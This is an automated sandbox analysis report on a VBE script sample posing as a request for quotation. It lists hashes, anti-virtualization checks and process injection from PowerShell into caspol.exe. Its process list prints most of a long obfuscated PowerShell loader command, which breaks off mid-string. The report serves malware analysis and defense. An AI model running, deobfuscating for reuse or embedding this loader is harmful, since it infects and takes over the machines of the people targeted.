Analysis
max time kernel: 149s
max time network: 41s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 06-12-2022 07:01
Static task: static1
Behavioral task: behavioral1 (sample: RFQ No. 109050.vbe; resource: win7-20220812-en)
Behavioral task: behavioral2 (sample: RFQ No. 109050.vbe; resource: win10v2004-20220812-en)
General
Target: RFQ No. 109050.vbe
Size: 599KB
MD5: f11778cbde51d99c01d187b8a606b6c2
SHA1: 2ac169a3b9237a3dd5525a95b1712b690329757e
SHA256: 9ad8dc0946dc335ebe8487c8dcd9d352a24fd2ca8655bad38f476d57d5232f86
SHA512: 80b47960a21f0be15fe496adaedbaa47deae992848cd8dc25199d55d519346cffc5cf07b8fabf45ef154048bbe0eb57144f3802cef64191e59de7718f529f3dd
SSDEEP: 6144:RlBnkjE4CJiP4RdKkDSlVciFCGGnzQhbIkY+PGZjjb3WabtHnatinzzVMce0NVnT:RvnkjCIPi/DSl6KWkYjiywg3VMM88oEb
Malware Config
Signatures

Checks QEMU agent file (2 TTPs, 1 IoC)
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
  description              ioc                                    process
  File opened (read-only)  C:\Program Files\Qemu-ga\qemu-ga.exe   powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
  pid   process
  860   powershell.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                          pid   process          target process
  PID 860 set thread context of 1876   860   powershell.exe   caspol.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid    process
  1200   powershell.exe
  988    powershell.exe
  860    powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
Processes:
  pid   process
  860   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description               pid    process
  Token: SeDebugPrivilege   1200   powershell.exe
  Token: SeDebugPrivilege   988    powershell.exe
  Token: SeDebugPrivilege   860    powershell.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Processes:
  description                         pid    process          target process
  PID 1928 wrote to memory of 1200    1928   WScript.exe      powershell.exe
  PID 1928 wrote to memory of 1200    1928   WScript.exe      powershell.exe
  PID 1928 wrote to memory of 1200    1928   WScript.exe      powershell.exe
  PID 1200 wrote to memory of 988     1200   powershell.exe   powershell.exe
  PID 1200 wrote to memory of 988     1200   powershell.exe   powershell.exe
  PID 1200 wrote to memory of 988     1200   powershell.exe   powershell.exe
  PID 1200 wrote to memory of 988     1200   powershell.exe   powershell.exe
  PID 988 wrote to memory of 860      988    powershell.exe   powershell.exe
  PID 988 wrote to memory of 860      988    powershell.exe   powershell.exe
  PID 988 wrote to memory of 860      988    powershell.exe   powershell.exe
  PID 988 wrote to memory of 860      988    powershell.exe   powershell.exe
  PID 860 wrote to memory of 1876     860    powershell.exe   caspol.exe
  PID 860 wrote to memory of 1876     860    powershell.exe   caspol.exe
  PID 860 wrote to memory of 1876     860    powershell.exe   caspol.exe
  PID 860 wrote to memory of 1876     860    powershell.exe   caspol.exe
  PID 860 wrote to memory of 1876     860    powershell.exe   caspol.exe
Processes
[1] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ No. 109050.vbe"
- Suspicious use of WriteProcessMemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Acopyrin = """OvFScuLunChcDitSuiBeoInnHa ChHDiTCuBBa Fl{Ca Br At Se BipUgaRarGaaNomTr(Fa[VaSfltTirPriBonUugRn]So`$PlGFoaSplprdEseOmbHurRerEleGenOveLa)Ph;Ol Po Ra Pu Al`$SlTIsiGalHesRetOveSgdNceKavBarMeeAanbudSieHasUn Pi=Al KiNgyebewYo-AcOCibTojHyeKacFatHi FobDiyChtFoeSp[Kl]ov Yo(Be`$PlGKnaRelPodFleInbUnrHurUreStnSpeHa.SpLSeeVinRegMitUnhpo Ti/Je Sk2Me)Ac;De Va Pr Sh fiFNuoFyrVe(Mo`$HaJPoeMiuNunPoeCrsIn=ko0So;No Bi`$SkJKoeOpuJonLaeDasDe In-ArlUdtJu Ma`$BoGKraNdlModObeNibLirPrrEneJunVaeNo.PoLGyeOenPrgNatCohPl;Sa Un`$FoJAnetruSonRaeCesEv+Te=Sa2Fi)Su{Re as Pr in Fo Ve Ba Nd To`$MoTOuiSclLosTitSteOrdCreDevHarVeeGonRedVieAfsKl[Ma`$CuJFyePauMynSteUnsLa/fa2So]To Ar=Fl ny[GncSpoFonSovqueWarSitUn]Wa:Be:beTCloNeBFayPrtAleSk(ba`$SkGAlaInlPodTieFrbTerBerReeClnWoeLy.VgSlouUdbFesJotLerTaiErnMigSo(Hy`$BiJabeKauConSmeBesBu,Fo Rg2Ta)Sl,Bn Af1Bo6Se)No;Sa In Ov`$HaTOliPolStsSotsueFrdVeePrvBarBieInnAcdPoeBnsAc[Ko`$BaJVieMiuFonKaeBosUk/Bi2Ho]Ho Kr=An Ri(Fe`$AfTDiiMelIlsMetAfePadBoehivUnrAneHenVedBeeunsBe[Tu`$BeJKoeduubanAleDasLy/Sq2Ne]Po Ph-MibSaxPeoXirMe Ge1Ap2Ab1En)No;Yo Ko Ta Gl Ko}Br Au[FaSLotGarIciUnnKngSk]Ps[BaSAaySesDetUteMamCl.ToTBoeWixsitUp.PlErdnGacagoOvdDeiGanSkgFa]Bi:Ma:JoAThSCaCPoItrIEx.UnGEmeUntBeSsytpjrTeiPinRegMa(Ga`$HeTSpiBrlSnsBitDyeThdbleChvLurdeeInnJudHoeNysSy)Bi;Un}Sk`$ZoQMouChaCorTe0Me=KiHPrTSuBGr By'Ou2YvASt0An0St0FiAMi0BiDGo1UbCTh1Sh4Le5Un7Re1TrDFu1Be5Na1Fe5Sp'Bl;Ko`$ReQCautbaasrIn1Ma=SeHViTMaBTh Gr'Vi3Sa4Kl1No0Op1ZoASa0liBNi1Ov6Ud0AfASh1Ly6En1UdFNe0UnDBa5Pi7Lu2MuEMa1ri0Pe1Sk7Ry4MiAPa4FrBUn5Ho7Fe2foCAf1Ji7Re0ElAKo1Pa8Un1MeFMi1PoCLy3Pl7Di1Ab8Sa0BoDme1Kn0Ud0EnFBe1inCPr3op4pl1EtCVe0FoDSu1Fo1Sa1ek6Pr1SeDMu0MaAUd'Ro;mi`$KoQUnuKiaUdrBi2Ac=HeHbeTDrBSp Di'pr3DyEOb1toCId0maDGl2Op9Sp0InBIn1Ar6Un1PaAPa3Jo8Re1AmDSp1DeDDi0ClBko1OpCUn0CaAIm0BeAFo'Ma;Lo`$SeQSauFraEtrHe3Bo=MeHPeTOvBEx 
In'Mo2KaAFo0Su0Du0LoAGi0TeDPl1InCUl1Fo4Pu5Ma7Ne2HeBPa0FrCCr1As7An0ArDJa1ca0Be1Ep4Su1unCTe5re7Hy3Un0Vi1Du7Fn0IdDDy1FeCSe0PrBFe1Ma6Vo0Me9Re2AnAOb1weCNi0AcBun0InFpa1Co0Ma1unAFl1GrCAr0BeAWh5Ra7Fl3Sk1As1Hv8Ec1dr7Ga1TiDCe1Re5Su1fiCac2UnBMa1FjCKw1TuFKe'An;Wo`$neQSnuAnaBurSt4ty=CeHLfTSaBUn Vo'Su0RaATe0BrDVe0InBBu1Et0Du1Li7Mi1ErEAl'Ne;Fr`$StQVruBoaIsrfo5Bl=MaHBaTFeBhe De'Ja3paEUn1PlCqu0woDAc3An4Fl1Th6St1UnDBe0KsCSy1ar5Un1InCMa3So1Pr1Re8Do1Sk7Af1GiDUn1Ut5Mi1KoCRe'Au;Fe`$FaQTeuJyaMorBe6Ce=TiHBrTMiBfo Tr'Di2AfBLy2UiDBl2PrAIn0Su9se1toCKo1AlAHi1Ga0Fi1Ls8Hj1Kr5Da3Ra7Pr1En8Sk1Ga4Ob1InCPr5Ar5Lu5Dg9Sa3Ov1sp1Ph0Co1UdDTa1MeCSa3TuBin0Sk0Br2StADi1sm0Ud1UnEOr5Sa5Gr5Py9Fu2Ev9Sy0piCVa1AdBDe1Re5Op1Ba0Ap1ObAFe'Co;Pa`$RoQRiudiaLrrSk7Sk=AcHHyTOxBSm In'be2BaBFo0CaCFa1Ki7ch0LyDHu1Ch0Ar1Sy4Ru1NaCUn5se5Po5Ak9Po3Ca4El1Fo8De1Ma7Ok1Do8gr1unEPh1goCSi1OpDPi'Ma;Li`$AlQInuaraInrSe8Pi=ApHJuTCaBTw St'St2PhBDr1DrCtr1ApFPe1Ma5Sl1FlCCu1spAEn0PeDFo1CiCSc1GaDEk3StDTa1DeCTe1Ge5Ov1ReCKe1FaEMo1Um8Bo0SoDso1BuCAg'Sc;Sy`$BrQakuVoaUnrPh9Re=soHMoTArBFa Ad'St3Ga0Sh1Fr7Su3Em4Ko1TeCAk1In4ja1En6De0PaBPa0Pr0Wa3Bl4sp1De6Un1FoDFi0klCMo1Kl5Ra1BrCVe'Go;Ap`$BaAOrrbamseeRekTaoPorTrpNesSlsIn0Ba=KoHEmTBiBKh Da'To3Di4Th0In0An3FoDSp1DoCSc1Ma5Ch1moCRh1ReESa1Pr8Cu0ToDSt1NoCfj2GyDar0co0Na0Ci9Se1GeCAb'Ud;Sy`$BiAAnrTrmTuesekHioInrAtpSpsOpsOv1ag=UfHKoTEnBGa Un'Sh3AfASt1Be5Wa1Re8Fi0OrATr0GaAGr5fo5Sa5Ud9En2Sl9Su0DiCLs1StBsk1Un5Co1De0Gr1AnAMe5Ro5Ar5St9Ci2AnALe1TrCWa1Ga8Fr1Fr5Pr1LaCAr1CuDHa5Ru5mi5Mo9In3Mo8Ge1im7Ge0ReATe1Ko0Sm3AcADa1Fo5Ho1Ki8Un0MeATa0ReARd5Ak5Pr5Qu9Po3Su8Ta0OlCPh0KvDFe1Do6Bl3GrABo1pa5Fr1Co8Fr0HaALa0InASl'Te;Fo`$WaAsprTamPrehokUnoKerMapRasHasPe2ta=TuHMiTScBGa Mo'Fo3Ad0Ou1Yd7Tr0SeFUd1By6Bu1As2An1KuCSp'ui;An`$ReAAsrRemKoeenkDioCorMepSesscsDe3Sa=ReHBaTBoBRi Jo'to2Da9In0FoCUs1ViBCh1La5Uf1fr0St1SeAPe5Ou5Ak5Tr9Bl3Li1In1Fi0vi1FoDUn1OgCPo3AuBCa0No0St2WhAAm1Ho0Ch1SeECo5pl5gr5Ki9Ot3Un7Un1EnCTr0FrEIn2BrAEl1Co5Sc1Ty6Lo0LsDCi5St5Ge5On9th2PoFPi1Un0Co0PoBPe0efDIn0SaCSa1an8Di1Wa5Be'Sa;Sy`$TrABkrRemNoeBrkraoSlrHypKrsCysSe4Ma=MoHSiTVaBfo 
De'st2beFUd1su0we0PrBIn0ShDRh0ReCBe1Do8Hu1Sl5Ko3Va8Ce1Fo5Sl1Ra5me1se6Sk1FaAEn'Ac;Ph`$CoATirwimareShkUdoInrFapHisKasAf5Be=VrHDaTLaBPs Fl'Bo1He7fu0CrDUn1HeDUn1an5Iv1Co5Wa'Am;Do`$DeALerErmSoeFlkBloCrrUfpKasxisFi6Fo=SyHMeTGaBAk Sp'Us3Re7Pa0HaDBi2Pr9Ge0CoBAf1Mi6Qu0EvDGe1TeCCo1PrASk0SoDAn2UnFty1Se0op0ScBDe0BoDSu0BuCUv1He8ca1Fr5At3Ar4In1SeCHa1Ch4Mi1Te6Cl0CoBMa0Ta0Bl'Si;Bl`$LeASarRamVeeSvkAfoKrrVepAfsBusCo7Tr=StHAdTGuBTo Ab'Bi3Ar0Fi3FoCRi2Ci1Sk'Sy;Di`$FlAAtrRdmHueRukScoOprRipPesNysCo8Wo=DoHBaTSeBSk be'Sv2Vk5ch'Ca;DefIkubinBicKitUniChoDinMi CafPikdupSt Un{DyPShaInrEyaStmAl Sn(Ko`$ReVViititLnaAklBriResKaeDa1Ma1Dr8Sp,Ic St`$BrKPrhAmaLotKarVaiSk3Lo8Br)Ed Da sk ar Fe Ce;cu`$FiSUnePrdprutalSvoDauJosTe0Na Ud=CeHImTTeBSy Re'pr5LdDco1UnBEf1Ev6Lu1Ha7Do1ciDBa1TaCCa1LiFNr1Sl8Eb1Ja7Rg1ThEDd1HjCpr0PrDAt5Ca9Sp4Fy4No5br9St5An1Ri2Fi2Fa3Di8Je0Be9un0Ac9Th3GeDCy1an6go1Vi4Ma1Ar8Po1Mr0As1Ma7Gi2An4Di4Fo3Ma4Su3Be3StATa0AkCGr0ReBla0juBun1CyCBe1Ga7Te0ArDSp3BaDMa1Sc6Ch1Me4Br1En8Vi1Yo0Em1He7Sl5Sl7Sk3neEEg1ReCAu0ejDSu3Be8Op0PiAHa0MaAPa1FiCpa1Ko4Re1SeBDr1su5rs1He0de1ApCEr0InATa5Dr1Br5Gu0Fe5Ka9Au0Ci5Ba5Ha9Du2KaEUp1Fo1Eg1DyCSc0BnBAf1diCNi5Af4Ol3ve6Sk1CrBRe1In3In1HaCKu1SqAWi0CaDUn5Or9Ov0Pl2Pu5Ab9As5stDDo2Ca6Mi5Un7Un3EdENy1de5Bo1Ge6Li1EnBNo1Au8Ri1fe5Ho3Pa8ho0LrASa0CaABl1DeCud1Gr4Sk1SnBIn1Se5Po0ep0Ta3IcABj1Tv8At1TrAFr1tr1Da1ReCMi5Un9Hi5fi4Fo3Kv8Da1Be7Pr1TrDIk5St9Ti5FoDHe2Bl6Un5Du7En3Ma5Co1Cu6Ud1MiAEx1Ne8Hi0noDLe1No0Pr1Sv6Ma1Ur7Qu5Di7Ke2ToAMe0Sp9No1Ng5So1Mi0Ch0ToDru5Sl1Sk5NdDPr3im8Pi0AlBOm1Sk4Su1SeCHa1Cy2Sy1Aa6Bo0GaBDi0Wa9Pr0SpATe0esARe4Un1Su5Sk0Fe2En2Ty5Pr4Gr4te8Ch2St4Em5Un7Eb3BiCPr0St8Ra0DeCFr1Fo8Re1Ec5Ra0ViABl5st1Fo5PeDMi2Pa8Ba0StCGe1Pa8Sq0IdBNs4Re9Ca5Co0Ba5Sv9Ud0Pr4Le5Ud0Su5Sv7Sa3InEDe1TiCPi0RuDOp2DeDLi0In0Ek0Sa9Fa1UnCTa5Do1Ci5ReDan2Cr8co0ymCKx1Ge8Sv0BoBUn4De8Ko5Ud0Un'Ta;Pr&Th(Ba`$HeAStrcomAneTikBeoEprWhpAusPasCo7Do)Kl Po`$VaSByeBedBeuIclPuoNouDisBi0As;Tr`$nsSPrefadHeuOrlBeoCouDdsRe5Sp im=An BeHFaTPsBSe 
Ru'No5BaDEb3Pi2Me1HdCMi0whDBo1PeAfi1ov1ts0ToCPs0Ha9tr0te9Un1TeCAl1Sy7Du0PoACy5Ra9vo4hj4Ha5Un9Mi5AlDMi1MeBNa1Sa6Ap1Li7Se1fyDSu1OvCtu1SaFAn1pr8Ko1Ha7Pl1elESo1stCFi0SoDUr5Mu7Pa3WeEPi1FuCNe0ChDCo3Sl4Ad1NoCGr0CuDPr1pr1He1Zo6la1VrDMe5Jo1Ak5FiDPa2An8Ac0BaCHe1Va8Ze0BaBSk4OvBSe5Ha5Pa5Ma9vi2tr2Li2KlDAp0Fr0Fe0Co9Pr1BaCBe2Mi2Pr2Bn4Es2In4Sp5Ej9dr3Re9Je5Co1Un5StDCa2Ba8ve0ToCLu1Ov8Po0PaBDi4SoAUd5In5Bl5Ma9ps5CeDRo2Sa8No0BeCAn1No8Fo0SaBRe4SuDAn5di0Sa5Od0Ha'Aa;Fe&Au(Nu`$TiAAnrHomKveBlkSkoJurNepObsUnsSe7Ge)Ar Sn`$SnSPeeTadRauEmlKdoUnuMlsLe5De;Ur`$TeSTeeFrdInuRelHeohyuMassv1Sk Ma=po JoHLbTFoBad Ab'St0StBfi1SyCMi0PaDBi0DaCKi0AmBGl1Tr7Ne5se9Pu5UrDOi3Ar2Re1ClCMo0VeDBl1HiAUn1Sa1Ud0OvCHa0Su9Un0ap9Ta1MeCCy1Pr7Tr0SkABa5Pr7Te3De0Se1Fo7Fa0TrFSt1Cu6Ti1Su2Mi1AmCAf5Re1Pa5FrDLo1Fe7He0OpCSi1An5Au1My5Ex5ca5Re5Tr9Ma3Fi9Ud5Pa1Pe2St2Tr2AfAFo0Fi0To0ClARe0StDPo1GoCAl1re4tr5Pl7Bd2PrBDr0veCFo1Br7Mi0EtDKo1Li0Sp1lo4Pr1DaCPo5Ud7Co3Ar0Kn1In7Ma0spDSk1GyCCa0GaBHe1Ha6Gr0Ar9De2KoAWi1SkCfl0riBIn0FeFIr1Fo0Re1BaAUb1StCEp0SpASa5Ru7Se3Co1tr1Wa8Ri1Ud7bl1ViDsy1Sn5Ab1BuCSr2UnBSk1MaCBe1TeFTr2St4Bo5Li1Mi3Mo7Gu1RiCfr0EuEga5Sa4af3Sp6Sp1AlBIs1No3No1OpCSi1InASt0KnDSt5Ph9Ju2ToATe0Ex0Ps0DiAUn0GeDCo1PoCCh1Gt4Mi5Un7Va2UiBFr0KaCGo1Fo7un0RhDAv1Al0Sm1Cl4St1ShCLi5Mo7Gy3Fi0We1Un7Sa0SaDSp1beCSy0TaBKl1St6Pa0fo9St2EtAUn1FoCdi0InBKi0MaFDo1Dr0To1PoACh1OrCRe0OvAFe5cu7Su3Ca1Un1Fl8Fo1No7Fo1GaDfr1Ca5Fr1AfCau2SeBun1CaCGa1beFDi5Op1Vi5Ti1Ka3Un7Cl1VaCSk0AfEEl5Re4Af3Af6st1InBBe1Bi3Pa1ReCKe1NeAUn0BeDsc5Fr9Pa3Ma0Mo1Ba7ch0OfDNe2Sa9Fo0MeDGr0SjBPr5Ci0Ra5Il5Al5De9Mi5fi1Ra5NaDDe1FlBPo1Br6Ba1Bu7af1AsDHr1AtCHe1ReFsu1Pr8El1He7en1KlETe1EnCIs0RaDBl5Re7Fu3MeEAb1BrCFo0VrDFo3Sc4Ca1InCLe0CoDAt1Hi1Ha1Pa6Sn1FrDBi5Sp1Se5HeDTa2Ro8Un0BiCTa1St8In0saBSk4StCFl5Ga0Ci5Ba0Sc5Ko7Am3Am0Me1Hi7Ad0AsFAr1Be6Fo1Va2De1GoCVi5Be1Sa5OvDFi1Do7Fr0MoCBu1Re5St1De5Ve5Ar5Nu5Co9Ou3Da9Pr5ek1Su5PrDFl2OcFfa1Ve0Rh0NaDKr1Ma8Sl1Tr5Ke1Ob0Rr0RaAun1trCSt4Mi8Ne4sy8Sp4Ar1Fa5Il0Hi5Bi0Ps5Sh0Fo5Ja0Yg5Ci5Kl5Ai9Ph5SwDMe3Un2In1No1Ud1Di8Ad0BaDPa0svBBi1Tr0Dr4UdAEu4Ko1Zi5La0Su5Be0Ps'As;Ta&Mi(Fu`$AbAHerlimGsePekGroP
arSppunsAnsuv7Ef)My Mi`$UdSFleGldGnuLilHuoChuAvsFr1Ph;Un}defdauglnFocBytFoiopoFrnCa PhGBiDIhTBe Ul{ToPSkaMerBeaDimBr Li(Ly[PiPPeaStrOcaRemFaeMatNoeKlrKo(pyPQuoflsHaibetCeiSuoStnno Ap=Sm St0Fo,Fo DeMAnaBrnVedDeaCatdioRerPoySt In=De De`$HeTArrVauYaeSk)Re]Ov Ji[StTFiyDupMoeBl[Pe]Ro]Ro No`$toCAriRegAlaBarAtePhtPotTeeWarSlsUd,Ny[SyPUnaNerPlaBemAjeVitUdeBerTr(PePSaoUnsStiPrtHoiEloalnMe La=An Ma1Ce)To]Iz Ch[BoTLiyBlpcoeEx]Et Th`$CiOJavHaeAlrDucCooStoGilBe Em=Za En[FrVFaodriCodBi]Bl)em;Lo`$FoSDeeDadBouOrlUnopauEksPt2Re Vi=lg StHHeTTrBEs Ef'Fo5ReDTe2JoASk0CoCwi0Fi9Yv1KoCSc0saBBl1UpFBi1De6St0HeAAb1MeFSt1Sa8Tr0edDTr1ClCDo0SmBSk1fa7ma1SkCsm5Ro9Da4Ja4Eg5ta9He2Di2Ph3Bi8Co0Pt9Bu0Va9Do3ErDBa1Un6Pi1Lr4ve1Vi8Ut1Fo0Ur1Al7De2Ou4In4Oc3To4Ae3Co3PoASt0SaCFi0FoBTh0ruBMa1arCRe1Gi7bv0DoDCh3SeDFo1Ge6Ny1ro4Pl1Fr8Sk1Ni0hn1Ul7Br5Sg7No3AnDKa1CoCDo1PaFNo1Fo0Fo1Ha7di1PaCRa3ReDOu0Mo0Go1Be7Fr1Ob8La1Fe4Ga1vi0Un1KpASe3Ta8Co0FeAst0RsAJu1ScCre1Ig4Re1PoBTo1Pr5Fa0Hu0Re5Sn1Sp5st1Re3li7He1LaCKo0heEMa5Sp4Wo3Kn6An1HiBMo1Po3Fl1DiCAn1CaAPo0UnDBe5Ub9So2KdAMi0Fo0St0FrATr0SaDOp1MuCRe1Ke4St5As7An2AuBSy1MeCGe1SyFHu1Re5Ug1brCEf1AnAse0DoDFe1Dr0by1Ki6Un1Hn7sr5Vi7Fr3Fr8Te0LaATv0saAUd1coCCo1Af4Di1FaBno1Ap5Sp0Fo0In3En7Fl1tr8Ti1Wa4Lb1EkCUv5Ga1Tu5KdDIn2Br8Ht0moCAf1Re8Ju0FoBDi4Br1Er5Ko0Sh5Fo0El5Fu5ns5fl9Fe2Ho2An2EvAKa0Eg0Sn0TrAEn0YpDSy1ViCVu1Ho4Dy5Tr7un2KnBTr1PlCAn1FlFPl1sp5In1DeCBo1PaAIn0FoDLi1Vi0Ye1cr6Ne1Fa7In5Mi7St3UnCfl1Re4Af1An0Ta0AnDSv5Ba7Fo3Rg8Fl0PoABe0StATu1WhCIn1Ma4Pr1InBRo1ov5Di0Ty0Gy3hjBIn0BaCPr1To0un1Qu5Ja1TrDBl1RiCap0FoBDr3Tr8Kl1FaAVi1KaASu1LuCen0OrACa0prAAr2Yp4ef4El3Kl4Va3Pa2ReBEm0GrCRe1Da7Va5An0Aa5Hy7In3VaDTi1KmCme1TeFKe1Op0St1De7Pa1SkCFr3RiDfa0Sa0Un1Ge7Af1Du8Bu1Ra4Pg1Br0Ps1GoAsk3Pr4Re1Gu6Sp1OvDvu0BrCDe1Uf5Ud1AfCMu5Dr1Tr5PrDWh2Vr8Ph0ApCLa1St8If0UnBKo4er0Si5Sk5Br5gr9fr5BiDEf1PrFTe1An8gr1Be5Rh0haASk1FrCJe5Be0Un5Pa7El3RuDVi1PoCCo1VaFMa1Un0Ce1Bl7Un1NuCVn2GuDox0Mg0Co0Pi9bo1skCFo5Ka1St5BrDTr3Sc8Lu0JiBFo1sa4Tr1AeCSk1Dd2qu1Vi6un0JaBNe0Hu9Su0VrAFr0noANo4Sa9Ti5Ho5Pa5Sp9te5LfDPr3Fu8Op0MiBSu1Pr4Do1UvCMa1Sp2Di1Br6Me0AbBRo0I
n9Re0NaAFo0ReAef4An8So5Al5tr5En9Mo2di2Le2WaAJa0An0Ja0MiAMi0DoDPa1SpCPl1Su4Mi5Un7St3Un4Sm0ToCSt1Un5Un0PaDIn1St0Im1AlADi1Co8Pr0SiAba0SuDFi3OvDUd1DuCVi1La5Bl1NeCSy1RaEPr1Ve8So0UnDSl1FaCUn2Ud4Ta5Su0Un'Bu;Hi&No(Sk`$SuAUnrFimIneNakUdoRirPjpSosSpsIs7St)Du Or`$PlSReehudFouStlHooKlutosRe2Is;Tw`$AfSDieUldPauTolTropluScsPh3Av Ka=Or CoHgeTOxBSl Fo'Ar5UnDPh2ReAUn0FoCCi0Dk9Fe1AsCSp0NuBHe1PlFMi1Ko6Sk0FlATr1EnFHe1Be8R 0VaDSa1SmCdu0NoBSa1Da7Mc1udCBr5Ri7Ti3udDVa1RgCMe1NoFIm1af0Uv1Af7Dr1PaCSy3BrAIr1ep6Su1Ph7na0BrAil0ReDBe0crBAm0SpCDs1CaAun0ClDdi1Av6Ps0DaBMu5Gl1Sp5McDAt2No8Pr0SlCUn1Dr8Rk0InBCu4BeFMi5Py5Sh5Ch9Sh2No2Al2ReAun0Pe0Fe0EnAAs0BiDBi1FoCSn1Or4se5In7sl2YnBsu1AnCPa1SkFTr1Lu5Ls1CoCHe1FrAFu0PrDTh1Pe0Qu1Or6Sl1Ep7fl5Ru7Le3PhALi1Th8re1Pe5Si1Bo5Va1Ca0Un1Un7Me1PrEDo3boADo1Th6Sp1Sp7Ci0FlFCo1FiCLa1Pr7Jo0HnDRo1An0Su1Ka6Ha1Sa7Kl0UtAIn2pe4da4Ea3ma4Al3Ce2ToAAe0ThDAm1Ma8Hr1Be7Ra1BaDFl1ve8pa0TwBBa1laDAm5En5Ke5Su9Ph5TuDNe3DrAsu1Pa0Bi1MaEMe1Or8Br0SlBco1HiCUn0AiDOp0OvDAb1PoCBo0SiBDi0StARa5Ua0pl5Co7Tr2CaAHe1FoCHe0AcDRa3Ta0St1Tr4Se0Ci9Ag1Kl5Ov1KoCHe1Me4Sa1MiCLa1Sm7Me0ArDFo1Ro8Fl0HuDDr1Ra0In1Fa6In1Vl7De3ooFti1Be5My1Al8Ko1BlETu0ClAMi5St1Su5muDKi2Lo8Op0ErCpe1He8Vi0SuBko4NoECa5Co0Bl'Pi;So&Em(fo`$PaANorWhmunePhkOpoHyrFopSassasLe7Cu)Re So`$MiSBrepldSouBelsvoDiuCasTh3wr;Le`$KiSEneFodNouBulOkoAfuFasEn4Bl Ru=Pl liHItTStBSt 
Sn'Bu5MaDPu2EnABu0caCKs0Th9Sa1DiCKo0SyBWh1MaFLa1Ko6Il0CoABe1EnFKo1Op8Ba0FrDAi1UnCSp0UdBUn1He7La1SkCKe5Ko7Br3QuDTa1ArCme1beFHa1Sy0Sy1Re7St1FoCpr3Ap4To1feCMi0AlDJo1Br1Po1En6Us1GaDCe5Se1Fa5EjDPa3Wo8Fu0BaBSe1Fi4ud1TrCPl1An2Ti1Ko6Su0efBFo0Ex9Pe0PlAOl0RaAKi4MaBSu5Ov5Ev5Sn9Pi5OvDBu3Ra8Ko0UbBAf1Uv4Sk1FoCUn1Si2Ha1Is6Ma0MeBUn0Ka9Ex0TeAGr0ExABj4SkAts5Kf5om5un9Fi5ArDMe3Ek6Me0CoFPy1InCHj0ShBop1FoAda1Be6Co1Va6In1Fl5Un5Be5be5ga9Do5AlDTr3FrALo1Ud0Fr1VeEPe1La8Ev0PlBPa1GrCUn0unDUd0GrDKo1AlCRe0PeBPr0SuACo5Sv0Ac5Sc7Sa2BlASp1PrCHo0UlDOv3In0Ci1Ti4St0Ss9Uh1Ad5ac1GrCRe1An4Tr1AnCEf1Ke7Da0SaDHo1Th8Th0AmDPe1Kr0Sl1Ti6St1Uo7Li3SmFHy1Op5In1Ep8So1LaEBa0ScADu5Ga1Gg5SyDTi2Pa8Ma0NiCEk1Fo8Cl0MiBTh4PlESk5Tr0be'Sp;Sk&Or(Re`$unAKorAamspeKnkTooArrinpBesStsSp7An)Mo En`$MiSGieMudNouBalPeoAruTasPa4Ac;Ep`$HvSDeeSudOkuUnlUnoPuuChsAs5Sa Un=Ja BaHyoTBoBLy Be'La0LiBSp1EoCEx0FeDOl0GlCBr0RuBAm1Un7Fi5Lt9Sy5jeDha2SyAHi0TlCMe0Po9Ba1BoCta0LiBBi1ViFFi1Pa6Ve0DeAKa1QuFsk1El8Ba0UpDDi1FoCGa0SkBBe1Af7ri1MeCDa5Co7Tr3EnAUn0SuBSy1AnCTa1Pu8Sp0UtDSi1MiCNo2TwDEp0No0Me0co9No1OrCTi5Fe1to5Ti0No'Fr;In&In(Su`$VaAsorSfmAkeEkkAroSordopUnsAusch7Fo)Af Ek`$DiSEneSedUpuTalDeoChuAmsEs5Es Ga Pl Th;Br}Sn`$AnRSpedicAleElsSlsLaiBroOnnLbeBerHe We=Pr VeHSkTChBIs At'Bl1Cu2Do1ScCFl0OuBTe1St7He1TrCHa1Un5Ma4suAKa4AnBRe'Sc;Ci`$DiSBleopdSiuFilMaoAuuOvsar6pr Ab=Be MoHInTGeBSt 
Is'Ds5ObDTu0SoBSy1Ca1Mi1Ve8Ti0EuDSy1Au8Tr1Di7Bi1pe0Fr1AaCbr0TaAGe5Be9De4Qu4Te5He9sk2Ni2Cr2PoAly0Fr0Ko0FlAHa0PrDOm1BaCMa1Gk4Af5Sp7Vr2TrBOv0EgCKa1Th7Sy0MoDLu1Ph0Ps1Re4Sa1OvCSc5La7ca3Pa0Wi1Ov7Sy0shDfi1PhCKa0PeBCh1Un6La0In9Sn2PaACr1UdCCa0KnBFa0EvFTy1Re0Br1SaAAn1ScCCa0DkABa5Ha7Ga3ti4Ek1Sa8No0InBFr0EfACo1Pe1Le1Fa8Kl1Ju5Wi2Uo4Fi4Mo3Po4Sd3Gl3HyEfr1FrCFi0RaDVa3JoDEp1PrCGu1Da5cr1AgCEp1FrEBi1Bl8Af0TeDud1FoCDe3GoFWa1Gy6Un0SaBOd3UsFdu0BrCAn1Mu7Si1DiASp0CrDWe1Re0Ta1Ku6Eb1In7Di2Ig9Re1Be6Bi1Re0Ch1me7Un0AmDAn1PlCLe0UnBIm5Ti1Re5Ka1Ko1TvFIm1re2de0Ts9Le5Ga9Fr5deDTr2DdBIs1StCse1GiAUn1KaCMe0TaAIn0BeAKi1on0Ci1Ad6Dy1Re7at1GaCCi0DeBDu5Mi9Cu5AaDKw3Gr8Se0diBHa1me4Ca1DeCFo1Ma2Ud1Fr6Ko0SuBeg0Ov9Av0EnAKo0BeAFa4TuDLa5Gr0Me5In5Zo5Ma9Bo5au1Un3BiEOl3NoDdo2DeDGr5co9Ca3En9Ig5Ta1Br2Bl2tj3ge0Bk1Uv7Vk0DuDLi2Pi9De0HoDLu0noBPh2Ko4Me5We5Ko5Ro9Ku2Va2Va2UnCGo3Sa0Aa1Te7Fu0SyDpa4DeAGu4CeBMi2Ka4Lr5Ca5Ku5Ba9Im2Ha2Fo2PaCRe3Ko0No1De7Ta0EnDPu4Co